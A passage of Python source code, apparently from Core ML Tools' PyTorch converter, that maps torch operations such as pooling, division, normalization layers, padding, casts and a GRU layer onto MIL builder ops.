- 1\n When ceil mode is False:\n out_dim = floor((in_dim + pad_l + pad_r - kernel_size) / stride) + 1\n\n\n # follow the approach here to calculate padding:\n # https://github.com/pytorch/pytorch/blob/edf751ca2fededecdd9366874c761431c0f61f01/aten/src/ATen/native/mkldnn/Pooling.cpp#L121\n # which keeps increasing the pad_r value until the output size without the ceil mode matches that of the ceil mode\n \"\"\"\n\n def _calculate_pool_output_size(in_dim, kernel, stride, pad_l, pad_r, ceil_mode):\n if ceil_mode:\n out_dim = _math.floor((in_dim + pad_r + pad_l - kernel + stride - 1) / stride) + 1\n if (out_dim - 1) * stride >= in_dim + pad_l and (pad_l > 0 or pad_r > 0):\n out_dim = out_dim - 1\n else:\n out_dim = _math.floor((in_dim + pad_r + pad_l - kernel) / stride) + 1\n return out_dim\n\n new_pad = pad_sizes.copy()\n for idx in range(len(input_shape)):\n if is_symbolic(input_shape[idx]):\n logger.warning(\n \"pooling padding adjusted to support ceil_mode=True, for symbolic dimension.\"\n \"Output shape of the pool op maybe be wrong for certain input shapes.\"\n )\n new_pad[2 * idx + 1] += stride_sizes[idx] - 1\n else:\n out_dim_with_ceil_mode = _calculate_pool_output_size(\n input_shape[idx],\n kernel_size[idx],\n stride_sizes[idx],\n pad_sizes[2 * idx],\n pad_sizes[2 * idx + 1],\n True,\n )\n is_equal = False\n while not is_equal:\n out_dim_without_ceil_mode = _calculate_pool_output_size(\n input_shape[idx],\n kernel_size[idx],\n stride_sizes[idx],\n new_pad[2 * idx],\n new_pad[2 * idx + 1],\n False,\n )\n is_equal = True\n if out_dim_without_ceil_mode < out_dim_with_ceil_mode:\n new_pad[2 * idx + 1] += 1\n is_equal = False\n\n return new_pad\n\n\ndef _max_pool(context, node, inputs):\n x = inputs[0]\n kernel_sizes = inputs[1]\n strides = inputs[2]\n if strides.op.op_type == \"const\" and (not list(strides.val)):\n strides = mb.const(val=kernel_sizes.val, name=strides.name)\n\n pad_type = \"custom\"\n\n pad = np.array([0] * (kernel_sizes.shape[0] * 2)) if len(inputs) < 4 else _np.repeat(inputs[3].val, 2)\n dilation = np.array([1] * kernel_sizes.shape[0]) if len(inputs) < 5 else inputs[4].val\n ceil_mode = False if len(inputs) < 6 else inputs[5].val\n\n if _np.any(dilation > 1):\n # See: rdar://60633736 (Implement dilation for mil op max_pool)\n raise ValueError(\"@max_pool does not support dilation > 1\")\n\n spatial_rank = len(pad) // 2\n if spatial_rank > 2 and ceil_mode is True and list(strides.val) != [1] * len(strides.val):\n # since MIL does not support ceil_mode for 3D pool,\n # need to adjust padding values if ceil_mode is True\n # ceil_mode only causes any difference though, if the strides are not 1\n x_spatial_dimensions = x.shape[-spatial_rank:]\n pad = _adjust_pad_for_ceil_mode(x_spatial_dimensions, kernel_sizes.val, strides.val, pad)\n\n pool = mb.max_pool(\n x=x,\n kernel_sizes=kernel_sizes,\n strides=strides,\n pad_type=pad_type,\n pad=pad,\n name=node.name,\n ceil_mode=ceil_mode if spatial_rank <= 2 else False,\n )\n\n if node.kind == \"max_pool2d_with_indices\":\n # TODO(rdar://117038432) ([Executorch] Handle/Bind other outputs of `max_pool2d_with_indices` op during lowering)\n context.add((pool, None), torch_name=node.name)\n else:\n context.add(pool)\n\n\n@register_torch_op\ndef max_pool1d(context, node):\n inputs = _get_inputs(context, node, expected=6)\n _max_pool(context, node, inputs)\n\n\n@register_torch_op(torch_alias=[\"max_pool2d_with_indices\"])\ndef max_pool2d(context, node):\n inputs = _get_inputs(context, node, min_expected=3)\n _max_pool(context, node, inputs)\n\n\n@register_torch_op\ndef max_pool3d(context, node):\n inputs = _get_inputs(context, node, expected=6)\n _max_pool(context, node, inputs)\n\n\n@register_torch_op\ndef minimum(context, node):\n inputs = _get_inputs(context, node, expected=2)\n assert len(node.outputs) == 1\n x = context[node.inputs[0]]\n y = context[node.inputs[1]]\n out = mb.minimum(x=x, y=y, name=node.name)\n context.add(out)\n\n\n@register_torch_op\ndef clamp_min(context, node):\n x = _get_inputs(context, node, expected=2)\n x = mb.clip(x=x[0], alpha=x[1], beta=_np.inf, name=node.name)\n context.add(x)\n\n\n@register_torch_op\ndef maximum(context, node):\n inputs = _get_inputs(context, node, expected=2)\n assert len(node.outputs) == 1\n x = context[node.inputs[0]]\n y = context[node.inputs[1]]\n out = mb.maximum(x=x, y=y, name=node.name)\n context.add(out)\n\n\n@register_torch_op(torch_alias = [\"div.tensor\"])\ndef div(context, node):\n inputs = _get_inputs(context, node, expected=[2, 3])\n x = mb.cast(x=inputs[0], dtype=\"fp32\")\n y = mb.cast(x=inputs[1], dtype=\"fp32\")\n\n if len(inputs) > 2 and inputs[2] is not None:\n rounding_mode = inputs[2].val\n if rounding_mode == \"floor\":\n # round towards negative infinity\n # e.g.:\n # values before floor: [2.6, -3.4, -3.6]\n # values after floor: [2, -4, -4]\n res = mb.floor_div(x=x, y=y, name=node.name)\n elif rounding_mode == \"trunc\":\n # round towards 0\n # e.g.:\n # values before trunc: [2.6, -3.4, -3.6]\n # values after trunc: [2, -3, -3]\n z = mb.real_div(x=x, y=y)\n s = mb.sign(x=z)\n all_positive = mb.mul(x=z, y=s)\n all_positive_floor = mb.floor(x=all_positive)\n res = mb.mul(x=all_positive_floor, y=s, name=node.name)\n else:\n raise NotImplementedError(\n 'rounding mode \"{}\" not supported in the \"div\" op'.format(rounding_mode)\n )\n else:\n res = mb.real_div(x=x, y=y, name=node.name)\n\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"floordiv\"])\ndef floor_divide(context, node):\n inputs = _get_inputs(context, node, expected=2)\n inputs = promote_input_dtypes(inputs)\n div_res = mb.floor_div(x=inputs[0], y=inputs[1])\n # Pytorch's floor_divide always returns fp32, even if the inputs are int\n res = mb.cast(x=div_res, dtype='fp32', name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef true_divide(context, node):\n inputs = _get_inputs(context, node, expected=2)\n res = mb.real_div(x=inputs[0], y=inputs[1], name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"mul.tensor\", \"mul.scalar\"])\ndef mul(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs)\n if types.is_bool(x.dtype) and types.is_bool(y.dtype):\n res = mb.logical_and(x=x, y=y, name=node.name)\n else:\n res = mb.mul(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef pow(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x, y = promote_input_dtypes(inputs)\n res = mb.pow(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"rsub\"])\ndef sub(context, node):\n inputs = _get_inputs(context, node, expected=[2, 3])\n assert len(node.outputs) == 1\n\n if node.kind == \"rsub\":\n # rsub reverses the order of arguments\n y = inputs[0]\n x = inputs[1]\n else:\n x = inputs[0]\n y = inputs[1]\n\n if len(inputs) > 2:\n alpha = inputs[2].val\n\n # TODO (sberardi): 3rd param to aten::sub is a scale factor, need to handle that.\n # out=input-alpha x other\n # rdar://60175736\n if alpha != 1:\n raise ValueError(\"SUB does not support scale factor param\")\n\n x, y = promote_input_dtypes([x, y])\n res = mb.sub(x=x, y=y, name=node.name)\n context.add(res)\n\n\n@register_torch_op(\n torch_alias=[\n \"mean.dim\",\n \"sum\",\n \"logsumexp\",\n ]\n)\ndef mean(context, node):\n inputs = _get_inputs(context, node)\n\n x = inputs[0]\n if types.is_bool(x.dtype):\n # TODO: In the future when MIL op supports bool, we need to use curr_opset_version to decide\n # if we want to cast or not.\n x = mb.cast(x=x, dtype=\"fp32\")\n kwargs = {\"x\": x, \"name\": node.name}\n\n # @axes is optional, so omit if None.\n axes = inputs[1]\n if axes is not None:\n # @axes needs to be a list, but if only one axis was specified in the\n # model, it will be constructed as an int. Construct a new constant as a\n # list.\n if not isinstance(axes.val, _np.ndarray):\n axes = mb.const(val=[axes.val], name=axes.name + \"_list\")\n context.add(axes)\n kwargs[\"axes\"] = axes\n\n # @keep_dims is optional.\n if len(inputs) >= 3:\n keep_dims = inputs[2]\n kwargs[\"keep_dims\"] = keep_dims\n\n # Last input to mean is an optional output tensor. We always expect this to\n # be None or absent.\n assert len(inputs) <= 3 or inputs[3] is None\n if node.kind == \"sum\":\n res = mb.reduce_sum(**kwargs)\n elif node.kind == \"logsumexp\":\n res = mb.reduce_log_sum_exp(**kwargs)\n else:\n res = mb.reduce_mean(**kwargs)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"squeeze_copy.dim\", \"squeeze_copy.dims\"])\ndef squeeze(context, node):\n inputs = _get_inputs(context, node)\n if len(inputs) == 1:\n res = mb.squeeze(x=inputs[0], name=node.name)\n elif len(inputs) == 2:\n dims = inputs[1].val\n try:\n dims = (int(dims),)\n except:\n pass\n res = mb.squeeze(x=inputs[0], axes=dims, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"unsqueeze_copy\"])\ndef unsqueeze(context, node):\n inputs = _get_inputs(context, node, expected=2)\n unsqueeze = mb.expand_dims(x=inputs[0], axes=[inputs[1].val], name=node.name)\n context.add(unsqueeze)\n\n\n@register_torch_op\ndef size(context, node):\n inputs = _get_inputs(context, node, expected=[1, 2])\n x = inputs[0]\n\n # Get the shape of the tensor.\n if types.is_complex(x.dtype):\n size_node = mb.complex_shape(x=inputs[0], name=node.name + \"_shape\")\n else:\n size_node = mb.shape(x=inputs[0], name=node.name + \"_shape\")\n\n # Get the size of the tensor along the input dimension.\n if len(node.inputs) == 2:\n dim = inputs[1].val\n size_node = _list_select(size_node, dim)\n context.add(size_node, node.name)\n\n\n@register_torch_op\ndef _shape_as_tensor(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n # Get the shape of the tensor.\n shape_node = mb.shape(x=inputs[0], name=node.name)\n context.add(shape_node, node.name)\n\n\n@register_torch_op(torch_alias=[\"view_copy\", \"reshape\"])\ndef view(context, node):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n shape = inputs[1]\n\n if isinstance(shape, ListVar):\n length = mb.list_length(ls=shape)\n indices = mb.range_1d(start=0, end=length, step=1)\n shape = mb.list_gather(ls=shape, indices=indices)\n\n if isinstance(shape, list) and all(\n [isinstance(dim, Var) and len(dim.shape) == 0 for dim in shape]\n ):\n shape = mb.concat(values=shape, axis=0)\n\n shape = mb.cast(x=shape, dtype=\"int32\")\n\n if types.is_complex(x.dtype):\n real, imag = (mb.reshape(x=x, shape=shape, name=node.name) for x in (mb.complex_real(data=x), mb.complex_imag(data=x)))\n view = mb.complex(real_data=real, imag_data=imag, name=node.name)\n else:\n view = mb.reshape(x=x, shape=shape, name=node.name)\n\n context.add(view)\n\n\n@register_torch_op(torch_alias=['constant_pad_nd'])\ndef pad(context, node):\n inputs = _get_inputs(context, node)\n x = inputs[0]\n\n pad = inputs[1]\n if pad.val is not None:\n pad = pad.val.reshape((-1, 2))[::-1].reshape(-1).tolist()\n missing_dims = x.rank - (len(pad) // 2)\n pad = [0, 0] * missing_dims + pad\n\n if len(inputs) == 4:\n mode = inputs[2].val\n assert mode in ('constant', 'reflect', 'replicate')\n val_index = 3\n else:\n mode = 'constant'\n val_index = 2\n\n scalar_val = inputs[val_index] if inputs[val_index] else 0.0\n if inputs[val_index] and inputs[val_index].op.op_type == \"const\":\n scalar_val = float(scalar_val.val)\n\n if types.is_complex(x.dtype):\n real, imag = (mb.pad(x=x, pad=pad, mode=mode, constant_val=scalar_val, name=node.name) for x in (mb.complex_real(data=x), mb.complex_imag(data=x)))\n res = mb.complex(real_data=real, imag_data=imag, name=node.name)\n else:\n res = mb.pad(x=x, pad=pad, mode=mode, constant_val=scalar_val, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef adaptive_avg_pool1d(context, node):\n _adaptive_pool1d(context, node, mb.reduce_mean)\n\n\n@register_torch_op\ndef adaptive_avg_pool2d(context, node):\n _adaptive_pool2d(context, node, mb.avg_pool, mb.reduce_mean)\n\n\ndef _adaptive_pool1d(context, node, reduce_op):\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n assert len(inputs[1].val) == 1\n out_length = inputs[1].val[0]\n\n if len(x.shape) == 3:\n # 3D input\n begin_prefix = [0, 0]\n end_prefix = [x.shape[0], x.shape[1]]\n out_shape = [x.shape[0], x.shape[1], out_length]\n else:\n # 2D input\n assert len(x.shape) == 2\n begin_prefix = [0]\n end_prefix = [x.shape[0]]\n out_shape = [x.shape[0], out_length]\n\n pool_results = []\n for start, end in _get_kernel_indexes_1d_for_adaptive_pooling(x.shape[-1], out_length):\n cur_kernel = mb.slice_by_index(\n x=x,\n begin=begin_prefix + [start],\n end=end_prefix+[end],\n )\n cur_result = reduce_op(\n x=cur_kernel,\n axes=[-1],\n keep_dims=True\n )\n pool_results.append(cur_result)\n \n context.add(\n mb.reshape(\n x=mb.concat(values=pool_results, axis=-1),\n shape=out_shape,\n name=node.name,\n )\n )\n\n\n@register_torch_op\ndef adaptive_max_pool1d(context, node):\n _adaptive_pool1d(context, node, mb.reduce_max)\n\n\n@register_torch_op\ndef adaptive_max_pool2d(context, node):\n _adaptive_pool2d(context, node, mb.max_pool, mb.reduce_max)\n\n\ndef _get_kernel_indexes_1d_for_adaptive_pooling(\n in_dimension: int,\n out_dimension: int) -> List[Tuple[int, int]]:\n results = []\n for i in range(out_dimension):\n start = _math.floor(i * in_dimension / out_dimension)\n end = _math.ceil((i + 1) * in_dimension / out_dimension)\n results.append((start, end))\n return results\n\n\ndef _adaptive_pool2d_non_fixed_kernel_size_and_stride(x, output_shape, name, reduce_op):\n '''\n If the input dimension is not evenly divisible by the output dimension, then the\n stride and kernel size used by PyTorch is not fixed. This is true for both the\n height and width dimension.\n '''\n\n pool_results = []\n for s2, e2 in _get_kernel_indexes_1d_for_adaptive_pooling(x.shape[2], output_shape[0]):\n for s3, e3 in _get_kernel_indexes_1d_for_adaptive_pooling(x.shape[3], output_shape[1]):\n cur_kernel = mb.slice_by_index(\n x=x,\n begin=[0, 0, s2, s3],\n end=[x.shape[0], x.shape[1], e2, e3],\n )\n cur_result = reduce_op(\n x=cur_kernel,\n axes=[-2, -1],\n keep_dims=True\n )\n pool_results.append(cur_result)\n\n return mb.reshape(\n x=mb.concat(values=pool_results, axis=-1),\n shape=[x.shape[0], x.shape[1], output_shape[0], output_shape[1]],\n name=name,\n )\n\n\ndef _adaptive_pool2d(context, node, pool_op, reduce_op):\n # Get input tensor and output shape\n inputs = _get_inputs(context, node, expected=2)\n x = inputs[0]\n output_shape = inputs[1].val\n assert isinstance(output_shape, _np.ndarray) and len(output_shape) == 2\n output_shape = tuple(output_shape)\n\n if output_shape == (1, 1):\n # Represent (1,1) output size with global reduce op\n result = reduce_op(x=x, axes=[-2, -1], keep_dims=True, name=node.name)\n elif x.shape is None or any_symbolic(x.shape):\n raise ValueError(\n \"Adaptive pooling is only supported when input tensor size is known or output size == (1,1). \"\n \"Received: input size == {}, output size == {}\".format(\n x.shape_str(), output_shape,\n )\n )\n elif x.shape[-2] % output_shape[-2] == 0 and x.shape[-1] % output_shape[-1] == 0:\n # Stride and and kernel size is fixed\n strides = [ind // outd for ind, outd in zip(x.shape[-2:], output_shape)]\n kernel_sizes = [\n ind - s * (outd - 1)\n for ind, outd, s in zip(x.shape[-2:], output_shape, strides)\n ]\n result = pool_op(\n x=x,\n kernel_sizes=kernel_sizes,\n strides=strides,\n pad_type=\"valid\",\n name=node.name,\n )\n else:\n result = _adaptive_pool2d_non_fixed_kernel_size_and_stride(\n x, output_shape, node.name, reduce_op\n )\n\n context.add(result)\n\n\n@register_torch_op(torch_alias=[\"_native_batch_norm_legit_no_training\"])\ndef batch_norm(context, node):\n inputs = _get_inputs(context, node, expected=[7, 9])\n\n _input = inputs[0]\n weight = inputs[1]\n bias = inputs[2]\n running_mean = inputs[3]\n running_var = inputs[4]\n\n if len(inputs) == 9:\n # inputs skipped:\n # float momentum (6)\n # bool cudnn_enabled (8)\n\n training = inputs[5].val\n eps = inputs[7]\n # no: training, cudnn_enabled\n elif len(inputs) == 7:\n # inputs skipped:\n # float momentum (5)\n eps = inputs[6]\n\n training = False\n else:\n raise ValueError(\n f\"BatchNorm: got {len(inputs)} inputs, expected 7 or 9\"\n )\n input_rank = _input.rank\n if input_rank < 2 or input_rank > 5:\n raise ValueError(\n \"BatchNorm: Encountered invalid input rank during translation in torch frontend.\"\n )\n\n # If training = True, the mean and variance of the current batch of data are used to normalize the input data.\n # If training = False, data statistics running_mean and running_var are used instead.\n # Note that, even in the evaluation mode (after calling model.eval()), the training parameter can still be true\n # and it just refers to a different computation as mentioned above.\n\n # helper functions for different type of batch norm\n def _add_batch_norm_dynamic():\n x = _input\n\n if training or (running_mean is None) or (running_var is None):\n axes = [axis for axis in range(x.rank) if axis != 1]\n mean = mb.reduce_mean(x=x, axes=axes, keep_dims=True)\n num = mb.sub(x=x, y=mean)\n square = mb.mul(x=num, y=num)\n variance = mb.reduce_mean(x=square, axes=axes, keep_dims=True)\n shape = mb.shape(x=variance)\n else:\n shape = [1] * x.rank\n shape[1] = -1 if any_symbolic(running_mean.shape) else running_mean.shape[0]\n mean = mb.reshape(x=running_mean, shape=shape)\n num = mb.sub(x=x, y=mean)\n variance = mb.reshape(x=running_var, shape=shape)\n\n variance_add_epsilon = mb.add(x=variance, y=eps)\n sqrt = mb.sqrt(x=variance_add_epsilon)\n\n name = node.name if weight is None and bias is None else node.name + \"_div\"\n x = mb.real_div(x=num, y=sqrt, name=name)\n\n if weight is not None:\n weight_reshape = mb.reshape(x=weight, shape=shape)\n name = node.name if bias is None else node.name + \"_mul\"\n x = mb.mul(x=x, y=weight_reshape, name=name)\n\n if bias is not None:\n bias_reshape = mb.reshape(x=bias, shape=shape)\n x = mb.add(x=x, y=bias_reshape, name=node.name)\n\n return x\n\n def _add_batch_norm_1d():\n # first expand the 3d tensor to 4d, and call the standard mb.batch_norm\n x = mb.expand_dims(x=_input, axes=[-1], name=node.name + \"_rank2_expansion\")\n bn = mb.batch_norm(\n x=x,\n mean=running_mean,\n variance=running_var,\n gamma=weight,\n beta=bias,\n epsilon=eps,\n name=node.name + \"_batch_norm_1d\",\n )\n bn = mb.squeeze(x=bn, name=node.name, axes=[-1])\n return bn\n\n def _add_batch_norm():\n bn = mb.batch_norm(\n x=_input,\n mean=running_mean,\n variance=running_var,\n gamma=weight,\n beta=bias,\n epsilon=eps,\n name=node.name,\n )\n return bn\n\n is_batch_norm_1d_rank_2 = input_rank == 2\n\n if training or running_mean.val is None or running_var.val is None or weight is None or bias is None:\n bn = _add_batch_norm_dynamic()\n elif is_batch_norm_1d_rank_2:\n bn = _add_batch_norm_1d()\n else:\n bn = _add_batch_norm()\n\n if node.kind == \"_native_batch_norm_legit_no_training\":\n # TODO(rdar://117038279) ([Executorch] Handle/Bind other outputs of `_native_batch_norm_legit_no_training` op during lowering)\n bn = (bn, None, None)\n\n context.add(bn, torch_name=node.name)\n\n\n@register_torch_op\ndef instance_norm(context, node):\n inputs = _get_inputs(context, node, expected=9)\n x = inputs[0]\n weight = inputs[1]\n bias = inputs[2]\n eps = inputs[7]\n x = mb.instance_norm(\n x=x,\n gamma=weight,\n beta=bias,\n epsilon=eps,\n name=node.name,\n )\n context.add(x)\n\n\n@register_torch_op\ndef group_norm(context, node):\n inputs = _get_inputs(context, node, expected=6)\n x = inputs[0]\n num_groups = inputs[1].val\n weight = inputs[2]\n bias = inputs[3]\n eps = inputs[4]\n n,c = x.shape[0],x.shape[1] # at minimum (N, C) required\n num_groups = builtins.min(num_groups,c)\n new_shape = [n, num_groups, c//num_groups]\n # optimization for non symbolic shapes. This get rids of 3 mil ops that required on dynamic shapes\n if not any_symbolic(x.shape[2:]):\n new_shape += [*x.shape[2:]] # adds remaining dims\n input_shape = [*x.shape] # n, c, *\n else:\n input_shape = mb.shape(x=x)\n input_shape_sliced = mb.slice_by_size(x=input_shape, begin=[2], size=[-1]) # x_shape[2:]\n new_shape = mb.concat(values=[new_shape, input_shape_sliced], axis=0)\n\n num_extra_axes = len(x.shape[2:])\n axes_ = [int(i) for i in range(2, 2 + num_extra_axes + 1)]\n weight_shape, bias_shape = [1,c], [1,c]\n weight_shape += [1 for _ in range(num_extra_axes)]\n bias_shape += [1 for _ in range(num_extra_axes)]\n\n x = mb.reshape(x=x, shape=new_shape)\n mean = mb.reduce_mean(x=x, axes=axes_, keep_dims=True)\n var = _std(x,axes_,True,False,eps.val)\n x = mb.sub(x=x,y=mean)\n x = mb.real_div(x=x,y=var)\n x = mb.reshape(x=x, shape=input_shape)\n if weight is not None:\n weight = mb.reshape(x=weight, shape=weight_shape)\n x = mb.mul(x=x,y=weight)\n if bias is not None:\n bias = mb.reshape(x=bias, shape=bias_shape)\n x = mb.add(x=x, y=bias)\n context.add(x,node.name)\n\n\n@register_torch_op\ndef embedding(context, node):\n inputs = _get_inputs(context, node)\n _input = inputs[0]\n indices = inputs[1]\n\n padding_idx = -1\n scale_grad_by_freq = False\n sparse = False\n if len(inputs) >= 3:\n padding_idx = inputs[2].val\n if len(inputs) >= 4:\n scale_grad_by_freq = inputs[3].val\n if len(inputs) >= 5:\n sparse = inputs[4].val\n\n if padding_idx != -1 or scale_grad_by_freq or sparse:\n logger.warning(\n \"Core ML embedding (gather) layer does not support any \"\n \"inputs besides the weights and indices. Those given \"\n \"will be ignored.\"\n )\n\n indices = mb.cast(x=indices, dtype=\"int32\")\n\n # Changing the axis from 0 is not an option in torch, so we don't expose it\n gather = mb.gather(x=_input, indices=indices, name=node.name)\n context.add(gather)\n\n\n@register_torch_op\ndef hardtanh(context, node):\n inputs = _get_inputs(context, node, expected=3)\n _input = inputs[0]\n min_val = inputs[1].val\n max_val = inputs[2].val\n\n res = mb.clip(x=_input, alpha=min_val, beta=max_val, name=node.name)\n context.add(res)\n\n\n@register_torch_op(torch_alias=[\"concat\"])\ndef cat(context, node):\n inputs = _get_inputs(context, node)\n axis = 0 if len(inputs) == 1 else inputs[1]\n concat = mb.concat(\n values=promote_input_dtypes(inputs[0]), axis=axis, name=node.name\n )\n context.add(concat)\n\n\n@register_torch_op\ndef stack(context, node):\n inputs = _get_inputs(context, node)\n\n values = inputs[0]\n\n if len(inputs) < 2:\n axis = 0\n else:\n axis = inputs[1]\n\n if len(values) == 1:\n res = mb.expand_dims(x=values[0], axes=[axis.val], name=node.name)\n else:\n res = mb.stack(values=values, axis=axis, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef tile(context, node):\n x, dims = _get_inputs(context, node, expected=2)\n\n # The torch.tile only supports tuple of ints for \"dims\", not Tensor. So it will not be dynamic.\n if dims is None or dims.val is None:\n raise ValueError(\"The `dims` input for torch.tile must be static (tuple of ints).\")\n\n dims_num = dims.shape[0]\n if dims_num < x.rank:\n # When the number of elements in dims is smaller than rank of x, ones are prepended.\n prepend_ones = np.array([1] * (x.rank - dims_num))\n dims = mb.concat(values=(prepend_ones, dims), axis=0)\n\n res = mb.tile(x=x, reps=dims, name=node.name)\n context.add(res)\n\n\n@register_torch_op\ndef item(context, node):\n inputs = _get_inputs(context, node, expected=1)\n\n if inputs[0].shape == ():\n # MIL ops that reduce already output a scalar, so no need to do\n # anything.\n res = inputs[0]\n elif _np.all([d == 1 for d in inputs[0].shape]):\n # Item only makes sense when called on a length 1 tensor. We use\n # reduce_max as a workaround for not having a way to extract a scalar\n # from a symbolic tensor.\n res = mb.reduce_max(x=inputs[0], name=node.name)\n else:\n raise ValueError(\"expected input to be a scalar or a length 1 tensor\")\n context.add(res, node.name)\n\n\ndef _cast(context, node, dtype, dtype_name):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n # Input must either be a scalar or a (1 x 1 x ... x 1) tensor\n if not (len(x.shape) == 0 or _np.all([d == 1 for d in x.shape])):\n raise ValueError(\"input to cast must be either a scalar or a length 1 tensor\")\n\n if x.can_be_folded_to_const():\n # If x is a compile-time constant, directly cast it to @dtype if it's\n # not one already.\n if not isinstance(x.val, dtype):\n res = mb.const(val=dtype(x.val), name=node.name)\n else:\n res = x\n elif len(x.shape) > 0:\n x = mb.squeeze(x=x, name=node.name + \"_item\")\n res = mb.cast(x=x, dtype=dtype_name, name=node.name)\n else:\n res = mb.cast(x=x, dtype=dtype_name, name=node.name)\n context.add(res, node.name)\n\n\n@register_torch_op(torch_alias=[\"bool\"])\ndef _bool(context, node):\n _cast(context, node, bool, \"bool\")\n\n\n@register_torch_op(torch_alias=[\"int\"])\ndef _int(context, node):\n _cast(context, node, int, \"int32\")\n\n\n@register_torch_op(torch_alias=[\"native_layer_norm\"])\ndef layer_norm(context, node):\n inputs = _get_inputs(context, node, min_expected=5)\n _input = inputs[0]\n normalized_shape = inputs[1]\n weight = inputs[2]\n bias = inputs[3]\n eps = inputs[4]\n # cudnn_enable = inputs[5] unused\n\n layer_norm = mb.layer_norm(\n x=_input,\n axes=list(range(-len(normalized_shape.val), 0)),\n gamma=weight,\n beta=bias,\n epsilon=eps,\n name=node.name,\n )\n\n if node.kind == \"native_layer_norm\":\n # TODO(rdar://117038370) ([Executorch] Handle/Bind other outputs of `native_layer_norm` op during lowering)\n context.add((layer_norm, None, None), torch_name=node.name)\n else:\n context.add(layer_norm)\n\n\n@register_torch_op\ndef numtotensor(context, node):\n inputs = _get_inputs(context, node, expected=1)\n x = inputs[0]\n if x.shape != ():\n raise ValueError(\n \"numtotensor expected scalar input, got tensor with shape {}\".format(\n x.shape\n )\n )\n\n if x.can_be_folded_to_const():\n res = mb.const(val=[x.val], name=node.name)\n context.add(res)\n else:\n context.add(x, node.name)\n\n\ndef _ifzo_to_ifoz(weights, name):\n \"\"\"\n i, f, z, o -> i, f, o, z\n where weights_split[0] == i, etc.\n Used to transform lstm weights from pytorch\n to Core ML format\n \"\"\"\n split_size = weights.shape[0] // 4\n weights_split = mb.split(x=weights, split_sizes=_np.array([split_size] * 4), axis=0)\n return mb.concat(\n values=[weights_split[0], weights_split[1], weights_split[3], weights_split[2]],\n axis=0,\n )\n\n\ndef _pytorch_hidden_to_coreml_milops(x, name):\n \"\"\"\n Used to transform lstm state values (hn, cn)\n from pytorch to Core ML format.\n \"\"\"\n split_size = x.shape[0] // 2\n x_split = mb.split(x=x, split_sizes=_np.array([split_size] * 2), axis=0)\n x_concat = mb.concat(\n values=[x_split[0], x_split[1]],\n axis=2,\n )\n # (4.) See docstring to @lstm\n return mb.squeeze(x=x_concat, axes=_np.array([0]), name=name)\n\n\ndef _add_gru_layer(_input, h0, wi, wh, bi, bh, h_list_name, h_name):\n \"\"\"\n Add a single GRU layer.\n Please note that the Core ML GRU has different definition from Torch,\n so we cannot use mb.gru, and need to implement it with while loop.\n To be more specific, in Core ML:\n\n o_t = activation(W_{io} x_t + r_t * W_{ho} h_(t−1) + b_{o})\n\n while torch has\n o_t = activation(W_{io} x_t + b_{io} + r_t * (W_{ho} h_(t−1) + b_{ho}))\n\n Inputs:\n _input : (seq_len, batch_size, input_dim)\n h0 : (1, batch_size, hidden_dim)\n wi : (3*hidden_dim, input_dim) for the first layer, else (3*hidden_dim, hidden_dim)\n wh : (3*hidden_dim, hidden_dim)\n bi : (3*hidden_dim)\n bh : (3*hidden_dim)\n\n Return:\n h_list : the list contains all hidden states for each time step\n with shape (seq_len, batch_size, hidden_dim)\n h : the last hidden state, with shape (1, batch_size, hidden_dim\n \"\"\"\n\n # split the weights and bias\n w_ir, w_iz, w_in = _np.split(wi, 3)\n w_hr, w_hz, w_hn = _np.split(wh, 3)\n b_ir, b_iz, b_in = _np.split(bi, 3)\n b_hr, b_hz, b_hn = _np.split(bh, 3)\n\n # allocate hlist\n # hlist : (seq_len, batch_size, hidden_dim)\n x_shape = mb.shape(x=_input)\n seq_len = mb.slice_by_index(x=x_shape, begin=[0], end=[1])\n h_shape = mb.shape(x=h0)\n h_shape = mb.slice_by_index(x=h_shape, begin=[1], end=[3])\n h_list_shape = mb.concat(values=[seq_len, h_shape], axis=0)\n h_list = mb.fill(shape=h_list_shape)\n\n # concate h0 to h_list\n # h_list: (seq_len + 1, batch_size, hidden_dim)\n h_list = mb.concat(values=[h0, h_list], axis=0)\n\n def cond(i, h_list):\n return mb.less(x=i, y=seq_len)\n\n def body(i, h_list):\n # slice for the x and state for time step i\n # the resulting shape:\n # xt : (batch_size, input_dim)\n # h_prev : (batch_size, hidden_dim)\n\n xt = mb.gather(x=_input, indices=i, axis=0)\n h_prev = mb.gather(x=h_list, indices=i, axis=0)\n\n xt = mb.squeeze(x=xt, axes=[0])\n h_prev = mb.squeeze(x=h_prev, axes=[0])\n\n # rt = sigmoid(wir * xt + whr * h_prev + bir + bhr)\n # rt : (batch_size, hidden_dim)\n rt_1 = mb.linear(x=xt, weight=w_ir, bias=b_ir)\n rt_2 = mb.linear(x=h_prev, weight=w_hr, bias=b_hr)\n rt = mb.add(x=rt_1, y=rt_2)\n rt = mb.sigmoid(x=rt)\n\n # zt = sigmoid(wiz * xt + whz * h_prev + biz + bhz)\n # zt : (batch_size, hidden_dim)\n zt_1 = mb.linear(x=xt, weight=w_iz, bias=b_iz)\n zt_2 = mb.linear(x=h_prev, weight=w_hz, bias=b_hz)\n zt = mb.add(x=zt_1, y=zt_2)\n zt = mb.sigmoid(x=zt)\n\n # nt = tanh(win * xt + bin + rt(whn * h_prev + bhn))\n # nt : (batch_size, hidden_dim)\n nt_1 = mb.linear(x=xt, weight=w_in, bias=b_in)\n nt_2 = mb.linear(x=h_prev, weight=w_hn, bias=b_hn)\n nt_2 = mb.mul(x=rt, y=nt_2)\n nt = mb.add(x=nt_1, y=nt_2)\n nt = mb.tanh(x=nt)\n\n # h = (1-zt) * nt + zt* h_prev\n # h : (batch_size, hidden_dim)\n h_1 = mb.sub(x=1., y=zt)\n h_1 = mb.mul(x=h_1, 